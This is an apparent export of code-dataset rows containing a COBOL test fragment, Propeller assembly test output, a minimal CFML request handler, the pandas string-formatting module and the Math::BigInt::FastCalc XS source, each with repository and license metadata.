CALL "dump" USING G-S4
END-CALL.
CALL "dump" USING G-S5
END-CALL.
CALL "dump" USING G-S6
END-CALL.
CALL "dump" USING G-S7
END-CALL.
CALL "dump" USING G-S8
END-CALL.
CALL "dump" USING G-S9
END-CALL.
CALL "dump" USING G-S10
END-CALL.
CALL "dump" USING G-S11
END-CALL.
CALL "dump" USING G-S12
END-CALL.
CALL "dump" USING G-S13
END-CALL.
CALL "dump" USING G-S14
END-CALL.
CALL "dump" USING G-S15
END-CALL.
CALL "dump" USING G-S16
END-CALL.
CALL "dump" USING G-S17
END-CALL.
CALL "dump" USING G-S18
END-CALL.
INITIALIZE X-1.
CALL "dump" USING G-1
END-CALL.
INITIALIZE X-2.
CALL "dump" USING G-2
END-CALL.
INITIALIZE X-3.
CALL "dump" USING G-3
END-CALL.
INITIALIZE X-4.
CALL "dump" USING G-4
END-CALL.
INITIALIZE X-5.
CALL "dump" USING G-5
END-CALL.
INITIALIZE X-6.
CALL "dump" USING G-6
END-CALL.
INITIALIZE X-7.
CALL "dump" USING G-7
END-CALL.
INITIALIZE X-8.
CALL "dump" USING G-8
END-CALL.
INITIALIZE X-9.
CALL "dump" USING G-9
END-CALL.
INITIALIZE X-10.
CALL "dump" USING G-10
END-CALL.
INITIALIZE X-11.
CALL "dump" USING G-11
END-CALL.
INITIALIZE X-12.
CALL "dump" USING G-12
END-CALL.
INITIALIZE X-13.
CALL "dump" USING G-13
END-CALL.
INITIALIZE X-14.
CALL "dump" USING G-14
END-CALL.
INITIALIZE X-15.
CALL "dump" USING G-15
END-CALL.
INITIALIZE X-16.
CALL "dump" USING G-16
END-CALL.
INITIALIZE X-17.
CALL "dump" USING G-17
END-CALL.
INITIALIZE X-18.
CALL "dump" USING G-18
END-CALL.
INITIALIZE X-S1.
CALL "dump" USING G-S1
END-CALL.
INITIALIZE X-S2.
CALL "dump" USING G-S2
END-CALL.
INITIALIZE X-S3.
CALL "dump" USING G-S3
END-CALL.
INITIALIZE X-S4.
CALL "dump" USING G-S4
END-CALL.
INITIALIZE X-S5.
CALL "dump" USING G-S5
END-CALL.
INITIALIZE X-S6.
CALL "dump" USING G-S6
END-CALL.
INITIALIZE X-S7.
CALL "dump" USING G-S7
END-CALL.
INITIALIZE X-S8.
CALL "dump" USING G-S8
END-CALL.
INITIALIZE X-S9.
CALL "dump" USING G-S9
END-CALL.
INITIALIZE X-S10.
CALL "dump" USING G-S10
END-CALL.
INITIALIZE X-S11.
CALL "dump" USING G-S11
END-CALL.
INITIALIZE X-S12.
CALL "dump" USING G-S12
END-CALL.
INITIALIZE X-S13.
CALL "dump" USING G-S13
END-CALL.
INITIALIZE X-S14.
CALL "dump" USING G-S14
END-CALL.
INITIALIZE X-S15.
CALL "dump" USING G-S15
END-CALL.
INITIALIZE X-S16.
CALL "dump" USING G-S16
END-CALL.
INITIALIZE X-S17.
CALL "dump" USING G-S17
END-CALL.
INITIALIZE X-S18.
CALL "dump" USING G-S18
END-CALL.
MOVE ZERO TO X-1.
CALL "dump" USING G-1
END-CALL.
MOVE ZERO TO X-2.
CALL "dump" USING G-2
END-CALL.
MOVE ZERO TO X-3.
CALL "dump" USING G-3
END-CALL.
MOVE ZERO TO X-4.
CALL "dump" USING G-4
END-CALL.
MOVE ZERO TO X-5.
CALL "dump" USING G-5
END-CALL.
MOVE ZERO TO X-6.
CALL "dump" USING G-6
END-CALL.
MOVE ZERO TO X-7.
CALL "dump" USING G-7
END-CALL.
MOVE ZERO TO X-8.
CALL "dump" USING G-8
END-CALL.
MOVE ZERO TO X-9.
CALL "dump" USING G-9
END-CALL.
MOVE ZERO TO X-10.
CALL "dump" USING G-10
END-CALL.
MOVE ZERO TO X-11.
CALL "dump" USING G-11
END-CALL.
MOVE ZERO TO X-12.
CALL "dump" USING G-12
END-CALL.
MOVE ZERO TO X-13.
CALL "dump" USING G-13
END-CALL.
MOVE ZERO TO X-14.
CALL "dump" USING G-14
END-CALL.
MOVE ZERO TO X-15.
CALL "dump" USING G-15
END-CALL.
MOVE ZERO TO X-16.
CALL "dump" USING G-16
END-CALL.
MOVE ZERO TO X-17.
CALL "dump" USING G-17
END-CALL.
MOVE ZERO TO X-18.
CALL "dump" USING G-18
END-CALL.
MOVE ZERO TO X-S1.
CALL "dump" USING G-S1
END-CALL.
MOVE ZERO TO X-S2.
CALL "dump" USING G-S2
END-CALL.
MOVE ZERO TO X-S3.
CALL "dump" USING G-S3
END-CALL.
MOVE ZERO TO X-S4.
CALL "dump" USING G-S4
END-CALL.
MOVE ZERO TO X-S5.
CALL "dump" USING G-S5
END-CALL.
MOVE ZERO TO X-S6.
CALL "dump" USING G-S6
END-CALL.
MOVE ZERO TO X-S7.
CALL "dump" USING G-S7
END-CALL.
MOVE ZERO TO X-S8.
CALL "dump" USING G-S8
END-CALL.
MOVE ZERO TO X-S9.
CALL "dump" USING G-S9
END-CALL.
MOVE ZERO TO X-S10.
CALL "dump" USING G-S10
END-CALL.
MOVE ZERO TO X-S11.
CALL "dump" USING G-S11
END-CALL.
MOVE ZERO TO X-S12.
CALL "dump" USING G-S12
END-CALL.
MOVE ZERO TO X-S13.
CALL "dump" USING G-S13
END-CALL.
MOVE ZERO TO X-S14.
CALL "dump" USING G-S14
END-CALL.
MOVE ZERO TO X-S15.
CALL "dump" USING G-S15
END-CALL.
MOVE ZERO TO X-S16.
CALL "dump" USING G-S16
END-CALL.
MOVE ZERO TO X-S17.
CALL "dump" USING G-S17
END-CALL.
MOVE ZERO TO X-S18.
CALL "dump" USING G-S18
END-CALL.
STOP RUN.
| COBOL | 3 | 6un9-h0-Dan/cobaul | deps/gnucobol-2.2/tests/testsuite.src/numeric-dump.cob | [
"MIT"
] |
pub main
coginit(0, @entry, 0)
dat
org 0
entry
_toReal
mov arg02, imm_1199570944_
call #__system___float_mul
mov arg01, result1
mov arg02, #0
call #__system___float_tointeger
_toReal_ret
ret
__system___float_tointeger
mov __system___float_tointeger_r, arg02
mov __system___float_Unpack_s, arg01
shr __system___float_Unpack_s, #31
mov __system___float_Unpack_x, arg01
shl __system___float_Unpack_x, #1
shr __system___float_Unpack_x, #24 wz
and arg01, imm_8388607_
if_ne shl arg01, #6
if_ne or arg01, imm_536870912_
if_ne jmp #LR__0002
mov _tmp002_, arg01
mov _tmp001_, #32
LR__0001
shl _tmp002_, #1 wc
if_nc djnz _tmp001_, #LR__0001
sub _tmp001_, #23
mov __system___float_Unpack_x, _tmp001_
mov __system___float_Unpack__cse__0006, #7
sub __system___float_Unpack__cse__0006, _tmp001_
shl arg01, __system___float_Unpack__cse__0006
LR__0002
sub __system___float_Unpack_x, #127
mov result3, arg01
mov result2, __system___float_Unpack_x
mov __system___float_tointeger_x, result2
mov __system___float_tointeger_m, result3
cmps __system___float_tointeger_x, imm_4294967295_ wc,wz
if_b jmp #LR__0003
cmps __system___float_tointeger_x, #30 wc,wz
if_a jmp #LR__0003
shl __system___float_tointeger_m, #2
mov __system___float_tointeger__cse__0001, #30
sub __system___float_tointeger__cse__0001, __system___float_tointeger_x
shr __system___float_tointeger_m, __system___float_tointeger__cse__0001
add __system___float_tointeger_m, __system___float_tointeger_r
shr __system___float_tointeger_m, #1
cmp __system___float_Unpack_s, #0 wz
if_ne neg __system___float_tointeger_m, __system___float_tointeger_m
mov result1, __system___float_tointeger_m
jmp #__system___float_tointeger_ret
LR__0003
mov result1, #0
__system___float_tointeger_ret
ret
imm_1199570944_
long 1199570944
imm_4294967295_
long -1
imm_536870912_
long 536870912
imm_8388607_
long 8388607
result1
long 0
result2
long 0
result3
long 0
COG_BSS_START
fit 496
org COG_BSS_START
__system___float_Unpack__cse__0006
res 1
__system___float_Unpack_s
res 1
__system___float_Unpack_x
res 1
__system___float_tointeger__cse__0001
res 1
__system___float_tointeger_m
res 1
__system___float_tointeger_r
res 1
__system___float_tointeger_x
res 1
_tmp001_
res 1
_tmp002_
res 1
arg01
res 1
arg02
res 1
fit 496
| Parrot Assembly | 2 | archivest/spin2cpp | Test/Expect/stest247.pasm | [
"MIT"
] |
component{
	// Request lifecycle handler: executes the requested template inline in
	// the current context. (Per its repository path this file is a CFLint
	// parsing test fixture, so the code is intentionally minimal.)
	// NOTE(review): `include arguments.targetPage` runs a caller-supplied
	// path — potential path traversal/LFI if targetPage were untrusted;
	// confirm callers only pass framework-controlled paths.
	public void function onRequest(required string targetPage) {
		include arguments.targetPage;
		return;
	}
}
"BSD-3-Clause"
] |
"""
Module for formatting output data in console (to string).
"""
from __future__ import annotations
from shutil import get_terminal_size
from typing import Iterable
import numpy as np
from pandas.io.formats.format import DataFrameFormatter
from pandas.io.formats.printing import pprint_thing
class StringFormatter:
    """Formatter for string representation of a dataframe."""

    def __init__(self, fmt: DataFrameFormatter, line_width: int | None = None):
        # Keep a handle on the parent formatter plus frequently used
        # attributes; ``line_width`` (when given) enables wrapping logic.
        self.fmt = fmt
        self.adj = fmt.adj
        self.frame = fmt.frame
        self.line_width = line_width

    def to_string(self) -> str:
        """Build the final string, appending shape info when requested."""
        text = self._get_string_representation()
        if self.fmt.should_show_dimensions:
            text = "".join([text, self.fmt.dimensions_info])
        return text

    def _get_strcols(self) -> list[list[str]]:
        """Return formatted columns, adding '...' separators if truncated."""
        strcols = self.fmt.get_strcols()
        if self.fmt.is_truncated:
            strcols = self._insert_dot_separators(strcols)
        return strcols

    def _get_string_representation(self) -> str:
        """Dispatch to the appropriate rendering strategy."""
        if self.fmt.frame.empty:
            return self._empty_info_line

        strcols = self._get_strcols()

        if self.line_width is None:
            # no need to wrap around just print the whole frame
            return self.adj.adjoin(1, *strcols)

        if self._need_to_wrap_around:
            return self._join_multiline(strcols)

        return self._fit_strcols_to_terminal_width(strcols)

    @property
    def _empty_info_line(self) -> str:
        # Summary text used instead of a table when the frame has no cells.
        return (
            f"Empty {type(self.frame).__name__}\n"
            f"Columns: {pprint_thing(self.frame.columns)}\n"
            f"Index: {pprint_thing(self.frame.index)}"
        )

    @property
    def _need_to_wrap_around(self) -> bool:
        # Wrap when max_cols is unset or positive (columns not limited away).
        return bool(self.fmt.max_cols is None or self.fmt.max_cols > 0)

    def _insert_dot_separators(self, strcols: list[list[str]]) -> list[list[str]]:
        """Insert '...' markers for horizontal/vertical truncation."""
        str_index = self.fmt._get_formatted_index(self.fmt.tr_frame)
        index_length = len(str_index)

        if self.fmt.is_truncated_horizontally:
            strcols = self._insert_dot_separator_horizontal(strcols, index_length)

        if self.fmt.is_truncated_vertically:
            strcols = self._insert_dot_separator_vertical(strcols, index_length)

        return strcols

    @property
    def _adjusted_tr_col_num(self) -> int:
        # Shift the truncation column by one when an index column is shown.
        return self.fmt.tr_col_num + 1 if self.fmt.index else self.fmt.tr_col_num

    def _insert_dot_separator_horizontal(
        self, strcols: list[list[str]], index_length: int
    ) -> list[list[str]]:
        """Insert a whole ' ...' column at the truncation position."""
        strcols.insert(self._adjusted_tr_col_num, [" ..."] * index_length)
        return strcols

    def _insert_dot_separator_vertical(
        self, strcols: list[list[str]], index_length: int
    ) -> list[list[str]]:
        """Insert a row of dots into every column at the truncation row."""
        n_header_rows = index_length - len(self.fmt.tr_frame)
        row_num = self.fmt.tr_row_num
        for ix, col in enumerate(strcols):
            cwidth = self.adj.len(col[row_num])

            if self.fmt.is_truncated_horizontally:
                is_dot_col = ix == self._adjusted_tr_col_num
            else:
                is_dot_col = False

            # Narrow columns (width <= 3) get shorter dots, except the
            # dedicated dot column which always uses "...".
            if cwidth > 3 or is_dot_col:
                dots = "..."
            else:
                dots = ".."

            # Index column is left-justified; everything else right-justified.
            if ix == 0 and self.fmt.index:
                dot_mode = "left"
            elif is_dot_col:
                cwidth = 4
                dot_mode = "right"
            else:
                dot_mode = "right"

            dot_str = self.adj.justify([dots], cwidth, mode=dot_mode)[0]
            col.insert(row_num + n_header_rows, dot_str)
        return strcols

    def _join_multiline(self, strcols_input: Iterable[list[str]]) -> str:
        """Render the frame in vertical chunks joined by blank lines."""
        lwidth = self.line_width
        adjoin_width = 1
        strcols = list(strcols_input)

        if self.fmt.index:
            # Index column is repeated on every chunk, so reserve its width.
            idx = strcols.pop(0)
            lwidth -= np.array([self.adj.len(x) for x in idx]).max() + adjoin_width

        col_widths = [
            np.array([self.adj.len(x) for x in col]).max() if len(col) > 0 else 0
            for col in strcols
        ]

        assert lwidth is not None
        col_bins = _binify(col_widths, lwidth)
        nbins = len(col_bins)

        if self.fmt.is_truncated_vertically:
            assert self.fmt.max_rows_fitted is not None
            nrows = self.fmt.max_rows_fitted + 1
        else:
            nrows = len(self.frame)

        str_lst = []
        start = 0
        for i, end in enumerate(col_bins):
            row = strcols[start:end]
            if self.fmt.index:
                row.insert(0, idx)
            if nbins > 1:
                # Append a continuation marker (' \') on all but the last
                # chunk; pad the last chunk with blanks to keep alignment.
                if end <= len(strcols) and i < nbins - 1:
                    row.append([" \\"] + [" "] * (nrows - 1))
                else:
                    row.append([" "] * nrows)
            str_lst.append(self.adj.adjoin(adjoin_width, *row))
            start = end
        return "\n\n".join(str_lst)

    def _fit_strcols_to_terminal_width(self, strcols: list[list[str]]) -> str:
        """Drop middle columns until the repr fits the terminal width."""
        from pandas import Series

        lines = self.adj.adjoin(1, *strcols).split("\n")
        max_len = Series(lines).str.len().max()
        # plus truncate dot col
        width, _ = get_terminal_size()
        dif = max_len - width
        # '+ 1' to avoid too wide repr (GH PR #17023)
        adj_dif = dif + 1
        col_lens = Series([Series(ele).apply(len).max() for ele in strcols])
        n_cols = len(col_lens)
        counter = 0
        # Repeatedly remove the middle column until the remainder fits.
        while adj_dif > 0 and n_cols > 1:
            counter += 1
            mid = round(n_cols / 2)
            mid_ix = col_lens.index[mid]
            col_len = col_lens[mid_ix]
            # adjoin adds one
            adj_dif -= col_len + 1
            col_lens = col_lens.drop(mid_ix)
            n_cols = len(col_lens)

        # subtract index column
        max_cols_fitted = n_cols - self.fmt.index
        # GH-21180. Ensure that we print at least two.
        max_cols_fitted = max(max_cols_fitted, 2)
        self.fmt.max_cols_fitted = max_cols_fitted

        # Call again _truncate to cut frame appropriately
        # and then generate string representation
        self.fmt.truncate()
        strcols = self._get_strcols()
        return self.adj.adjoin(1, *strcols)
def _binify(cols: list[int], line_width: int) -> list[int]:
adjoin_width = 1
bins = []
curr_width = 0
i_last_column = len(cols) - 1
for i, w in enumerate(cols):
w_adjoined = w + adjoin_width
curr_width += w_adjoined
if i_last_column == i:
wrap = curr_width + 1 > line_width and i > 0
else:
wrap = curr_width + 2 > line_width and i > 0
if wrap:
bins.append(i)
curr_width = w_adjoined
bins.append(len(cols))
return bins
| Python | 5 | 13rianlucero/CrabAgePrediction | crabageprediction/venv/Lib/site-packages/pandas/io/formats/string.py | [
"MIT"
] |
#include "EXTERN.h"
#include "perl.h"
#include "XSUB.h"
/* for Perl prior to v5.7.1 */
#ifndef SvUOK
# define SvUOK(sv) SvIOK_UV(sv)
#endif
double XS_BASE = 0;
double XS_BASE_LEN = 0;
MODULE = Math::BigInt::FastCalc PACKAGE = Math::BigInt::FastCalc
PROTOTYPES: DISABLE
#############################################################################
# 2002-08-12 0.03 Tels unreleased
# * is_zero/is_one/is_odd/is_even/len work now (pass v1.61 tests)
# 2002-08-13 0.04 Tels unreleased
# * returns no/yes for is_foo() methods to be faster
# 2002-08-18 0.06alpha
# * added _num(), _inc() and _dec()
# 2002-08-25 0.06 Tels
# * added __strip_zeros(), _copy()
# 2004-08-13 0.07 Tels
# * added _is_two(), _is_ten(), _ten()
# 2007-04-02 0.08 Tels
# * plug leaks by creating mortals
# 2007-05-27 0.09 Tels
# * add _new()
#define RETURN_MORTAL_INT(value) \
ST(0) = sv_2mortal(newSViv(value)); \
XSRETURN(1);
#define RETURN_MORTAL_BOOL(temp, comp) \
ST(0) = sv_2mortal(boolSV( SvIV(temp) == comp));
#define CONSTANT_OBJ(int) \
RETVAL = newAV(); \
sv_2mortal((SV*)RETVAL); \
av_push (RETVAL, newSViv( int ));
void
_set_XS_BASE(BASE, BASE_LEN)
	SV*	BASE
	SV*	BASE_LEN
  CODE:
    /* Cache the Perl-side BASE (the per-limb radix, e.g. 1e9) and BASE_LEN
       (decimal digits per limb) in C globals so the other XSUBs can use
       them without passing them on every call. */
    XS_BASE = SvNV(BASE);
    XS_BASE_LEN = SvIV(BASE_LEN);
##############################################################################
# _new
AV *
_new(class, x)
SV* x
INIT:
STRLEN len;
char* cur;
STRLEN part_len;
CODE:
/* create the array */
RETVAL = newAV();
sv_2mortal((SV*)RETVAL);
if (SvUOK(x) && SvUV(x) < XS_BASE)
{
/* shortcut for integer arguments */
av_push (RETVAL, newSVuv( SvUV(x) ));
}
else
{
/* split the input (as string) into XS_BASE_LEN long parts */
/* in perl:
[ reverse(unpack("a" . ($il % $BASE_LEN+1)
. ("a$BASE_LEN" x ($il / $BASE_LEN)), $_[1])) ];
*/
cur = SvPV(x, len); /* convert to string & store length */
cur += len; /* doing "cur = SvEND(x)" does not work! */
# process the string from the back
while (len > 0)
{
/* use either BASE_LEN or the amount of remaining digits */
part_len = (STRLEN) XS_BASE_LEN;
if (part_len > len)
{
part_len = len;
}
/* processed so many digits */
cur -= part_len;
len -= part_len;
/* printf ("part '%s' (part_len: %i, len: %i, BASE_LEN: %i)\n", cur, part_len, len, XS_BASE_LEN); */
if (part_len > 0)
{
av_push (RETVAL, newSVpvn(cur, part_len) );
}
}
}
OUTPUT:
RETVAL
##############################################################################
# _copy
void
_copy(class, x)
SV* x
INIT:
AV* a;
AV* a2;
I32 elems;
CODE:
a = (AV*)SvRV(x); /* ref to aray, don't check ref */
elems = av_len(a); /* number of elems in array */
a2 = (AV*)sv_2mortal((SV*)newAV());
av_extend (a2, elems); /* pre-padd */
while (elems >= 0)
{
/* av_store( a2, elems, newSVsv( (SV*)*av_fetch(a, elems, 0) ) ); */
/* looking and trying to preserve IV is actually slower when copying */
/* temp = (SV*)*av_fetch(a, elems, 0);
if (SvIOK(temp))
{
av_store( a2, elems, newSViv( SvIV( (SV*)*av_fetch(a, elems, 0) )));
}
else
{
av_store( a2, elems, newSVnv( SvNV( (SV*)*av_fetch(a, elems, 0) )));
}
*/
av_store( a2, elems, newSVnv( SvNV( (SV*)*av_fetch(a, elems, 0) )));
elems--;
}
ST(0) = sv_2mortal( newRV_inc((SV*) a2) );
##############################################################################
# __strip_zeros (also check for empty arrays from div)
void
__strip_zeros(x)
SV* x
INIT:
AV* a;
SV* temp;
I32 elems;
I32 index;
CODE:
a = (AV*)SvRV(x); /* ref to aray, don't check ref */
elems = av_len(a); /* number of elems in array */
ST(0) = x; /* we return x */
if (elems == -1)
{
av_push (a, newSViv(0)); /* correct empty arrays */
XSRETURN(1);
}
if (elems == 0)
{
XSRETURN(1); /* nothing to do since only one elem */
}
index = elems;
while (index > 0)
{
temp = *av_fetch(a, index, 0); /* fetch ptr to current element */
if (SvNV(temp) != 0)
{
break;
}
index--;
}
if (index < elems)
{
index = elems - index;
while (index-- > 0)
{
av_pop (a);
}
}
XSRETURN(1);
##############################################################################
# decrement (subtract one)
void
_dec(class,x)
SV* x
INIT:
AV* a;
SV* temp;
I32 elems;
I32 index;
NV MAX;
CODE:
a = (AV*)SvRV(x); /* ref to aray, don't check ref */
elems = av_len(a); /* number of elems in array */
ST(0) = x; /* we return x */
MAX = XS_BASE - 1;
index = 0;
while (index <= elems)
{
temp = *av_fetch(a, index, 0); /* fetch ptr to current element */
sv_setnv (temp, SvNV(temp)-1); /* decrement */
if (SvNV(temp) >= 0)
{
break; /* early out */
}
sv_setnv (temp, MAX); /* overflow, so set this to $MAX */
index++;
}
/* do have more than one element? */
/* (more than one because [0] should be kept as single-element) */
if (elems > 0)
{
temp = *av_fetch(a, elems, 0); /* fetch last element */
if (SvIV(temp) == 0) /* did last elem overflow? */
{
av_pop(a); /* yes, so shrink array */
/* aka remove leading zeros */
}
}
XSRETURN(1); /* return x */
##############################################################################
# increment (add one)
void
_inc(class,x)
SV* x
INIT:
AV* a;
SV* temp;
I32 elems;
I32 index;
NV BASE;
CODE:
a = (AV*)SvRV(x); /* ref to aray, don't check ref */
elems = av_len(a); /* number of elems in array */
ST(0) = x; /* we return x */
BASE = XS_BASE;
index = 0;
while (index <= elems)
{
temp = *av_fetch(a, index, 0); /* fetch ptr to current element */
sv_setnv (temp, SvNV(temp)+1);
if (SvNV(temp) < BASE)
{
XSRETURN(1); /* return (early out) */
}
sv_setiv (temp, 0); /* overflow, so set this elem to 0 */
index++;
}
temp = *av_fetch(a, elems, 0); /* fetch last element */
if (SvIV(temp) == 0) /* did last elem overflow? */
{
av_push(a, newSViv(1)); /* yes, so extend array by 1 */
}
XSRETURN(1); /* return x */
##############################################################################
# Make a number (scalar int/float) from a BigInt object
void
_num(class,x)
SV* x
INIT:
AV* a;
NV fac;
SV* temp;
NV num;
I32 elems;
I32 index;
NV BASE;
CODE:
a = (AV*)SvRV(x); /* ref to aray, don't check ref */
elems = av_len(a); /* number of elems in array */
if (elems == 0) /* only one element? */
{
ST(0) = *av_fetch(a, 0, 0); /* fetch first (only) element */
XSRETURN(1); /* return it */
}
fac = 1.0; /* factor */
index = 0;
num = 0.0;
BASE = XS_BASE;
while (index <= elems)
{
temp = *av_fetch(a, index, 0); /* fetch current element */
num += fac * SvNV(temp);
fac *= BASE;
index++;
}
ST(0) = newSVnv(num);
##############################################################################
AV *
_zero(class)
CODE:
CONSTANT_OBJ(0)
OUTPUT:
RETVAL
##############################################################################
AV *
_one(class)
CODE:
CONSTANT_OBJ(1)
OUTPUT:
RETVAL
##############################################################################
AV *
_two(class)
CODE:
CONSTANT_OBJ(2)
OUTPUT:
RETVAL
##############################################################################
AV *
_ten(class)
CODE:
CONSTANT_OBJ(10)
OUTPUT:
RETVAL
##############################################################################
void
_is_even(class, x)
SV* x
INIT:
AV* a;
SV* temp;
CODE:
a = (AV*)SvRV(x); /* ref to aray, don't check ref */
temp = *av_fetch(a, 0, 0); /* fetch first element */
ST(0) = sv_2mortal(boolSV((SvIV(temp) & 1) == 0));
##############################################################################
void
_is_odd(class, x)
SV* x
INIT:
AV* a;
SV* temp;
CODE:
a = (AV*)SvRV(x); /* ref to aray, don't check ref */
temp = *av_fetch(a, 0, 0); /* fetch first element */
ST(0) = sv_2mortal(boolSV((SvIV(temp) & 1) != 0));
##############################################################################
void
_is_one(class, x)
SV* x
INIT:
AV* a;
SV* temp;
CODE:
a = (AV*)SvRV(x); /* ref to aray, don't check ref */
if ( av_len(a) != 0)
{
ST(0) = &PL_sv_no;
XSRETURN(1); /* len != 1, can't be '1' */
}
temp = *av_fetch(a, 0, 0); /* fetch first element */
RETURN_MORTAL_BOOL(temp, 1);
##############################################################################
void
_is_two(class, x)
SV* x
INIT:
AV* a;
SV* temp;
CODE:
a = (AV*)SvRV(x); /* ref to aray, don't check ref */
if ( av_len(a) != 0)
{
ST(0) = &PL_sv_no;
XSRETURN(1); /* len != 1, can't be '2' */
}
temp = *av_fetch(a, 0, 0); /* fetch first element */
RETURN_MORTAL_BOOL(temp, 2);
##############################################################################
void
_is_ten(class, x)
SV* x
INIT:
AV* a;
SV* temp;
CODE:
a = (AV*)SvRV(x); /* ref to aray, don't check ref */
if ( av_len(a) != 0)
{
ST(0) = &PL_sv_no;
XSRETURN(1); /* len != 1, can't be '10' */
}
temp = *av_fetch(a, 0, 0); /* fetch first element */
RETURN_MORTAL_BOOL(temp, 10);
##############################################################################
void
_is_zero(class, x)
SV* x
INIT:
AV* a;
SV* temp;
CODE:
a = (AV*)SvRV(x); /* ref to aray, don't check ref */
if ( av_len(a) != 0)
{
ST(0) = &PL_sv_no;
XSRETURN(1); /* len != 1, can't be '0' */
}
temp = *av_fetch(a, 0, 0); /* fetch first element */
RETURN_MORTAL_BOOL(temp, 0);
##############################################################################
void
_len(class,x)
	SV*	x
  INIT:
    AV*	a;
    SV*	temp;
    IV	elems;
    STRLEN	len;
  CODE:
    /* Return the number of decimal digits of the big integer: each limb
       except the most significant contributes exactly XS_BASE_LEN digits;
       the most significant contributes its own string length. */
    a = (AV*)SvRV(x);			/* ref to array, don't check ref */
    elems = av_len(a);			/* index of the last limb (count - 1) */
    temp = *av_fetch(a, elems, 0);	/* fetch last element */
    SvPV(temp, len);			/* convert to string & store length */
    len += (IV) XS_BASE_LEN * elems;
    ST(0) = sv_2mortal(newSViv(len));
##############################################################################
void
_acmp(class, cx, cy);
SV* cx
SV* cy
INIT:
AV* array_x;
AV* array_y;
I32 elemsx, elemsy, diff;
SV* tempx;
SV* tempy;
STRLEN lenx;
STRLEN leny;
NV diff_nv;
I32 diff_str;
CODE:
array_x = (AV*)SvRV(cx); /* ref to aray, don't check ref */
array_y = (AV*)SvRV(cy); /* ref to aray, don't check ref */
elemsx = av_len(array_x);
elemsy = av_len(array_y);
diff = elemsx - elemsy; /* difference */
if (diff > 0)
{
RETURN_MORTAL_INT(1); /* len differs: X > Y */
}
else if (diff < 0)
{
RETURN_MORTAL_INT(-1); /* len differs: X < Y */
}
/* both have same number of elements, so check length of last element
and see if it differes */
tempx = *av_fetch(array_x, elemsx, 0); /* fetch last element */
tempy = *av_fetch(array_y, elemsx, 0); /* fetch last element */
SvPV(tempx, lenx); /* convert to string & store length */
SvPV(tempy, leny); /* convert to string & store length */
diff_str = (I32)lenx - (I32)leny;
if (diff_str > 0)
{
RETURN_MORTAL_INT(1); /* same len, but first elems differs in len */
}
if (diff_str < 0)
{
RETURN_MORTAL_INT(-1); /* same len, but first elems differs in len */
}
/* same number of digits, so need to make a full compare */
diff_nv = 0;
while (elemsx >= 0)
{
tempx = *av_fetch(array_x, elemsx, 0); /* fetch curr x element */
tempy = *av_fetch(array_y, elemsx, 0); /* fetch curr y element */
diff_nv = SvNV(tempx) - SvNV(tempy);
if (diff_nv != 0)
{
break;
}
elemsx--;
}
if (diff_nv > 0)
{
RETURN_MORTAL_INT(1);
}
if (diff_nv < 0)
{
RETURN_MORTAL_INT(-1);
}
ST(0) = sv_2mortal(newSViv(0)); /* X and Y are equal */
| XS | 5 | vlinhd11/vlinhd11-android-scripting | perl/src/ext/Math-BigInt-FastCalc/FastCalc.xs | [
"Apache-2.0"
] |
[package]
name = "cargo-test"
version = "0.1.0"
authors = ["josealbizures <albizures3601@gmail.com>"]
[dependencies]
[lib]
crate-type = ["cdylib"]
| TOML | 2 | johanberonius/parcel | packages/core/integration-tests/test/integration/rust-cargo/Cargo.toml | [
"MIT"
] |
' Entry point for the resetMockComponent e2e test: mockComponentsHelper()
' (defined elsewhere — presumably installs mocks for the testbed components;
' confirm against the helper's source), then the mock for
' ResetMocks_Testbed_2 alone is reset, so the two prints show which node
' still resolves to its mocked "foo" value.
sub Main()
    mockComponentsHelper()
    _brs_.resetMockComponent("ResetMocks_Testbed_2")
    node = createObject("RoSGNode", "ResetMocks_Testbed")
    node2 = createObject("RoSGNode", "ResetMocks_Testbed_2")
    print node.foo ' => "fake testbed 1"
    print node2.foo ' => "bar"
end sub
| Brightscript | 3 | lkipke/brs | test/e2e/resources/components/mocks/reset/resetMockComponent.brs | [
"MIT"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.